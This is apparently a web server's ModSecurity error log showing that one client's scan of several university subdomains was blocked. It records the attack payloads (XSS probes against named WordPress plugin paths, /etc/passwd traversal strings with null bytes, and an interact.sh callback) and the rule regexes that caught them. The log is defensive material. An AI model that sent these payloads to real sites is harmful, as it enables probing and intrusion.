[Tue Aug 29 11:54:23.592227 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApbUTcAAAAh"]
[Tue Aug 29 11:54:23.727913 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-8Co-f0AAApjINIAAAAm"]
[Tue Aug 29 11:54:25.155917 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAAqRzA4AAAAM"]
[Tue Aug 29 11:54:25.156084 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAAqSwgoAAAAN"]
[Tue Aug 29 11:54:25.193254 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAApXgdMAAAAU"]
[Tue Aug 29 11:54:25.235193 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAApl9@8AAAAo"]
[Tue Aug 29 11:54:25.255563 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAApXgdUAAAAU"]
[Tue Aug 29 11:54:25.279300 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO16AcCo-f0AAAor7vQAAAAk"]
[Tue Aug 29 11:54:26.156902 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AsCo-f0AAAqSwhIAAAAN"]
[Tue Aug 29 11:54:26.852762 2023] [:error] [pid 2709] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:q: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16AsCo-f0AAAqVbzYAAAAi"]
[Tue Aug 29 11:54:26.869819 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16AsCo-f0AAAqTvi0AAAAa"]
[Tue Aug 29 11:54:26.872426 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:q: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16AsCo-f0AAAph8wgAAAAj"]
[Tue Aug 29 11:54:26.987899 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16AsCo-f0AAAqUB1IAAAAb"]
[Tue Aug 29 11:54:26.991749 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16AsCo-f0AAAoGFl8AAAAE"]
[Tue Aug 29 11:54:27.035071 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqTvi8AAAAa"]
[Tue Aug 29 11:54:27.052311 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAoGFmEAAAAE"]
[Tue Aug 29 11:54:27.055122 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAor7wAAAAAk"]
[Tue Aug 29 11:54:27.107286 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAoGFmIAAAAE"]
[Tue Aug 29 11:54:27.111051 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:q: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAph8wwAAAAj"]
[Tue Aug 29 11:54:27.580976 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAApbUUMAAAAh"]
[Tue Aug 29 11:54:27.582238 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqeFNwAAAAx"]
[Tue Aug 29 11:54:27.583970 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqSwhkAAAAN"]
[Tue Aug 29 11:54:27.588614 2023] [:error] [pid 2715] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqb-pAAAAAu"]
[Tue Aug 29 11:54:27.590394 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAApV22QAAAAJ"]
[Tue Aug 29 11:54:27.624866 2023] [:error] [pid 2676] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:q: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAp0OFQAAAAI"]
[Tue Aug 29 11:54:27.631724 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqXyOoAAAAq"]
[Tue Aug 29 11:54:28.873048 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16BMCo-f0AAAqWwVcAAAAl"]
[Tue Aug 29 11:54:29.755027 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAApl@AMAAAAo"]
[Tue Aug 29 11:54:29.766583 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAqXyO8AAAAq"]
[Tue Aug 29 11:54:29.799174 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAqUB10AAAAb"]
[Tue Aug 29 11:54:29.810598 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAqSwiAAAAAN"]
[Tue Aug 29 11:54:29.811446 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAApmXu8AAAAp"]
[Tue Aug 29 11:54:30.540973 2023] [:error] [pid 2714] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BsCo-f0AAAqamjEAAAAt"]
